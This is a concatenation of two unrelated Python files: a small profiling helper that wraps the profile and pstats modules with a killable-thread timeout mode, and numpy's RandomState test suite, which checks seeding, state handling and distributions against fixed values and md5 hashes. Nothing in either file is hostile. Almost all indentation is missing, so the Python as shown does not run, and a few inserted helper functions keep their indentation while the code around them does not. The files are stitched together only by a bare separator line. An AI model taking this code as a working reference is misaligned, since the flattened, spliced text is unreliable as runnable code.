# 2010-09-17 - v0.4.2 - lrq3000
# * added an automatic calibration prior to profiling
# 2010-09-17 - v0.4.1 - lrq3000
# * fixed import bug
# 2010-09-16 - v0.4 - lrq3000
# * fallback to profile instead of cProfile : even if this pure python implementation is much slower, it at least work with threads (cProfile, alias hotshot, is not compatible with multi-threaded applications at the moment)
# 2010-09-09 - v0.3 - lrq3000
# * workaround for a bug with cProfile
# 2010-09-08 - v0.2 - lrq3000
# * added the parsestats, browsegui and browsenogui functions
# * centralized runprofile here
# 2010-09-06 - v0.1 - lrq3000
# * Initial version.
__author__ = 'lrq3000'
__version__ = '0.5.0'
noprofiler = False
try:
import profile, pstats # using profile and not cProfile because cProfile does not support multi-threaded applications.
except:
noprofiler = True
import sys, os, time  # time is used by runprofile's countdown/timeout handling
pathname = os.path.dirname(sys.argv[0])
sys.path.append(os.path.join(pathname))
from kthread import *
from profilebrowser import *
def runprofile(mainfunction, output, timeout = 0, calibrate=False):
'''
Run the functions profiler and save the result
If timeout is greater than 0, the profile will automatically stops after timeout seconds
'''
if noprofiler == True:
print('ERROR: profiler and/or pstats library missing ! Please install it (probably package named python-profile) before running a profiling !')
return False
# This is the main function for profiling
def _profile():
profile.run(mainfunction, output)
print('=> RUNNING FUNCTIONS PROFILER\n\n'); sys.stdout.flush();
# Calibrate the profiler (only use this if the profiler produces some funny stuff, but calibration can also produce even more funny stuff with the latest cProfile of Python v2.7! So you should only enable calibration if necessary)
if calibrate:
print('Calibrating the profiler...'); sys.stdout.flush();
cval = calibrateprofile()
print('Calibration found value : %s' % cval); sys.stdout.flush();
print('Initializing the profiler...'); sys.stdout.flush();
# Run in timeout mode (if the function cannot end by itself, this is the best mode: the function must end for the profile to be saved)
if timeout > 0:
pthread = KThread(target=_profile) # we open the function with the profiler, in a special killable thread (see below why)
print('Will now run the profiling and terminate it in %s seconds. Results will be saved in %s' % (str(timeout), str(output))); sys.stdout.flush();
print('\nCountdown:'); sys.stdout.flush();
for i in range(0,5):
print(str(5-i))
sys.stdout.flush()
time.sleep(1)
print('0\nStarting to profile...'); sys.stdout.flush();
pthread.start() # starting the thread
time.sleep(float(timeout)) # after this amount of seconds, the thread gets killed and the profiler will end its job
print('\n\nFinishing the profile and saving to the file %s' % str(output)); sys.stdout.flush();
pthread.kill() # we must end the main function in order for the profiler to output its results (if we didn't launch a thread and just closed the process, it would have done no result)
# Run in full length mode (we run the function until it ends)
else:
print("Running the profiler, please wait until the process terminates by itself (if you forcequit before, the profile won't be saved)")
_profile()
print('=> Functions Profile done !')
return True
def calibrateprofile():
'''
Calibrate the profiler (necessary to have non negative and more exact values)
'''
pr = profile.Profile()
calib = []
crepeat = 10
for i in range(crepeat):
calib.append(pr.calibrate(10000))
final = sum(calib) / crepeat
profile.Profile.bias = final # Apply computed bias to all Profile instances created hereafter
return final
def parseprofile(profilelog, out):
'''
Parse a profile log and print the result on screen
'''
file = open(out, 'w') # opening the output file
print('Opening the profile in %s...' % profilelog)
p = pstats.Stats(profilelog, stream=file) # parsing the profile with pstats, and output everything to the file
print('Generating the stats, please wait...')
file.write("=== All stats:\n")
p.strip_dirs().sort_stats(-1).print_stats()
file.write("=== Cumulative time:\n")
p.sort_stats('cumulative').print_stats(100)
file.write("=== Time:\n")
p.sort_stats('time').print_stats(100)
file.write("=== Time + cumulative time:\n")
p.sort_stats('time', 'cum').print_stats(.5, 'init')
file.write("=== Callees:\n")
p.print_callees()
file.write("=== Callers:\n")
p.print_callers()
#p.print_callers(.5, 'init')
#p.add('fooprof')
file.close()
print('Stats generated and saved to %s.' % out)
print('Everything is done. Exiting')
def browseprofile(profilelog):
'''
Browse interactively a profile log in console
'''
print('Starting the pstats profile browser...\n')
try:
browser = ProfileBrowser(profilelog)
print >> browser.stream, "Welcome to the profile statistics browser. Type help to get started."
browser.cmdloop()
print >> browser.stream, "Goodbye."
except KeyboardInterrupt:
pass
def browseprofilegui(profilelog):
'''
Interactively browse a profile log in a GUI using RunSnakeRun and SquareMap
'''
from runsnakerun import runsnake # runsnakerun needs the wxPython lib; if it's unavailable we can skip the GUI. RunSnakeRun is only used for GUI visualisation, not for profiling (pstats remains available for console browsing)
app = runsnake.RunSnakeRunApp(0)
app.OnInit(profilelog)
#app.OnInit()
app.MainLoop()
|
test_randomstate.py
|
import hashlib
import pickle
import sys
import warnings
import numpy as np
import pytest
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy.random import MT19937, PCG64
from numpy import random
INT_FUNCS = {'binomial': (100.0, 0.6),
'geometric': (.5,),
'hypergeometric': (20, 20, 10),
'logseries': (.5,),
'multinomial': (20, np.ones(6) / 6.0),
'negative_binomial': (100, .5),
'poisson': (10.0,),
'zipf': (2,),
}
if np.iinfo(int).max < 2**32:
# Windows and some 32-bit platforms, e.g., ARM
INT_FUNC_HASHES = {'binomial': '670e1c04223ffdbab27e08fbbad7bdba',
'logseries': '6bd0183d2f8030c61b0d6e11aaa60caf',
'geometric': '6e9df886f3e1e15a643168568d5280c0',
'hypergeometric': '7964aa611b046aecd33063b90f4dec06',
'multinomial': '68a0b049c16411ed0aa4aff3572431e4',
'negative_binomial': 'dc265219eec62b4338d39f849cd36d09',
'poisson': '7b4dce8e43552fc82701c2fa8e94dc6e',
'zipf': 'fcd2a2095f34578723ac45e43aca48c5',
}
else:
INT_FUNC_HASHES = {'binomial': 'b5f8dcd74f172836536deb3547257b14',
'geometric': '8814571f45c87c59699d62ccd3d6c350',
'hypergeometric': 'bc64ae5976eac452115a16dad2dcf642',
'logseries': '84be924b37485a27c4a98797bc88a7a4',
'multinomial': 'ec3c7f9cf9664044bb0c6fb106934200',
'negative_binomial': '210533b2234943591364d0117a552969',
'poisson': '0536a8850c79da0c78defd742dccc3e0',
'zipf': 'f2841f504dd2525cd67cdcad7561e532',
}
@pytest.fixture(scope='module', params=INT_FUNCS)
def int_func(request):
return (request.param, INT_FUNCS[request.param],
INT_FUNC_HASHES[request.param])
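# Illustrative sketch (not one of the upstream tests): the reference hashes above
# are md5 digests of little-endian sample streams. The exact seed and sample size
# used to produce the stored values are fixed where the int_func fixture is
# consumed, outside this excerpt, so the recipe below only shows the general shape.
def _example_int_func_hash(name='geometric'):
    args = INT_FUNCS[name]
    rs = random.RandomState(1234)
    vals = getattr(rs, name)(*args, size=1000)
    if sys.byteorder != 'little':
        vals = vals.byteswap()
    return hashlib.md5(vals.view(np.int8)).hexdigest()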
def assert_mt19937_state_equal(a, b):
assert_equal(a['bit_generator'], b['bit_generator'])
assert_array_equal(a['state']['key'], b['state']['key'])
assert_array_equal(a['state']['pos'], b['state']['pos'])
assert_equal(a['has_gauss'], b['has_gauss'])
assert_equal(a['gauss'], b['gauss'])
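# Minimal self-contained sketch (not an upstream test) of the dict compared by
# assert_mt19937_state_equal: RandomState.get_state(legacy=False) returns
# {'bit_generator': 'MT19937', 'state': {'key': ..., 'pos': ...},
#  'has_gauss': ..., 'gauss': ...}, and set_state() accepts the same dict back.
def _example_state_roundtrip():
    rs = random.RandomState(12345)
    rs.standard_normal()                # advance the stream a little
    state = rs.get_state(legacy=False)  # dict form of the MT19937 state
    other = random.RandomState()
    other.set_state(state)
    assert_mt19937_state_equal(state, other.get_state(legacy=False))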
class TestSeed(object):
def test_scalar(self):
s = random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, -0.5)
assert_raises(ValueError, random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, [-0.5])
assert_raises(ValueError, random.RandomState, [-1])
assert_raises(ValueError, random.RandomState, [4294967296])
assert_raises(ValueError, random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, random.RandomState, np.array([],
dtype=np.int64))
assert_raises(ValueError, random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, random.RandomState, [[1, 2, 3],
[4, 5, 6]])
def test_cannot_seed(self):
rs = random.RandomState(PCG64(0))
with assert_raises(TypeError):
rs.seed(1234)
def test_invalid_initialization(self):
assert_raises(ValueError, random.RandomState, MT19937)
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random.seed(1432985819)
non_contig = random.multinomial(100, pvals=pvals)
random.seed(1432985819)
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.random_state = random.RandomState(self.seed)
self.state = self.random_state.get_state()
def test_basic(self):
old = self.random_state.tomaxint(16)
self.random_state.set_state(self.state)
new = self.random_state.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(self.state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.random_state.standard_normal()
state = self.random_state.get_state()
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.random_state.standard_normal(size=16)
self.random_state.set_state(old_state)
x2 = self.random_state.standard_normal(size=16)
self.random_state.set_state(self.state)
x3 = self.random_state.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.random_state.negative_binomial(0.5, 0.5)
def test_get_state_warning(self):
rs = random.RandomState(PCG64())
with suppress_warnings() as sup:
w = sup.record(RuntimeWarning)
state = rs.get_state()
assert_(len(w) == 1)
assert isinstance(state, dict)
assert state['bit_generator'] == 'PCG64'
def test_invalid_legacy_state_setting(self):
state = self.random_state.get_state()
new_state = ('Unknown', ) + state[1:]
assert_raises(ValueError, self.random_state.set_state, new_state)
assert_raises(TypeError, self.random_state.set_state,
np.array(new_state, dtype=np.object))
state = self.random_state.get_state(legacy=False)
del state['bit_generator']
assert_raises(ValueError, self.random_state.set_state, state)
def test_pickle(self):
self.random_state.seed(0)
self.random_state.random_sample(100)
self.random_state.standard_normal()
pickled = self.random_state.get_state(legacy=False)
assert_equal(pickled['has_gauss'], 1)
rs_unpick = pickle.loads(pickle.dumps(self.random_state))
unpickled = rs_unpick.get_state(legacy=False)
assert_mt19937_state_equal(pickled, unpickled)
def test_state_setting(self):
attr_state = self.random_state.__getstate__()
self.random_state.standard_normal()
self.random_state.__setstate__(attr_state)
state = self.random_state.get_state(legacy=False)
assert_mt19937_state_equal(attr_state, state)
def test_repr(self):
assert repr(self.random_state).startswith('RandomState(MT19937)')
class TestRandint(object):
rfunc = random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
# We use an md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is cast
# as np.int64, and `ubnd` is cast as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it to be rounded down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
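# Illustrative sketch of the casting pitfall described in
# TestRandint.test_int64_uint64_corner_case above (not an upstream test).
def _example_int64_uint64_promotion():
    # int64 and uint64 have no common integer supertype, so they promote to float64
    assert np.result_type(np.int64, np.uint64) == np.float64
    lbnd = np.iinfo(np.int64).max      # 2**63 - 1
    ubnd = np.iinfo(np.int64).max + 1  # 2**63
    # both bounds collapse to the same float64 value after the implicit cast,
    # which is why a naive `lbnd >= ubnd` comparison used to reject this range
    assert np.float64(lbnd) == np.float64(ubnd)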
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
random.seed(self.seed)
actual = random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rand_singleton(self):
random.seed(self.seed)
actual = random.rand()
desired = 0.61879477158567997
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
random.seed(self.seed)
actual = random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.randn()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_randint(self):
random.seed(self.seed)
actual = random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(198, size=(3, 2))
assert_(len(w) == 1)
assert_array_equal(actual, desired + 100)
def test_tomaxint(self):
random.seed(self.seed)
rs = random.RandomState(self.seed)
actual = rs.tomaxint(size=(3, 2))
if np.iinfo(np.int).max == 2147483647:
desired = np.array([[1328851649, 731237375],
[1270502067, 320041495],
[1908433478, 499156889]], dtype=np.int64)
else:
desired = np.array([[5707374374421908479, 5456764827585442327],
[8196659375100692377, 8224063923314595285],
[4220315081820346526, 7177518203184491332]],
dtype=np.int64)
assert_equal(actual, desired)
rs.seed(self.seed)
actual = rs.tomaxint()
assert_equal(actual, desired[0, 0])
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
typer = np.dtype('l').type
actual = random.random_integers(typer(np.iinfo('l').max),
typer(np.iinfo('l').max))
assert_(len(w) == 1)
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
random.seed(self.seed)
actual = random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.random_sample()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_choice_uniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random.seed(self.seed)
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.randint(0, -10, size=0).shape, (0,))
assert_equal(random.randint(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random.seed(self.seed)
non_contig = random.choice(5, 3, p=p[::2])
random.seed(self.seed)
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_bytes(self):
random.seed(self.seed)
actual = random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_permutation(self):
random.seed(self.seed)
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [0, 1, 9, 6, 2, 4, 5, 8, 7, 3]
assert_array_equal(actual, desired)
random.seed(self.seed)
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
random.seed(self.seed)
bad_x_str = "abcd"
assert_raises(IndexError, random.permutation, bad_x_str)
random.seed(self.seed)
bad_x_float = 1.2
assert_raises(IndexError, random.permutation, bad_x_float)
integer_val = 10
desired = [9, 0, 8, 5, 1, 3, 4, 7, 6, 2]
random.seed(self.seed)
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_beta(self):
random.seed(self.seed)
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random.seed(self.seed)
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
random.seed(self.seed)
actual = random.binomial(100.123, .456)
desired = 37
assert_array_equal(actual, desired)
def test_chisquare(self):
random.seed(self.seed)
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
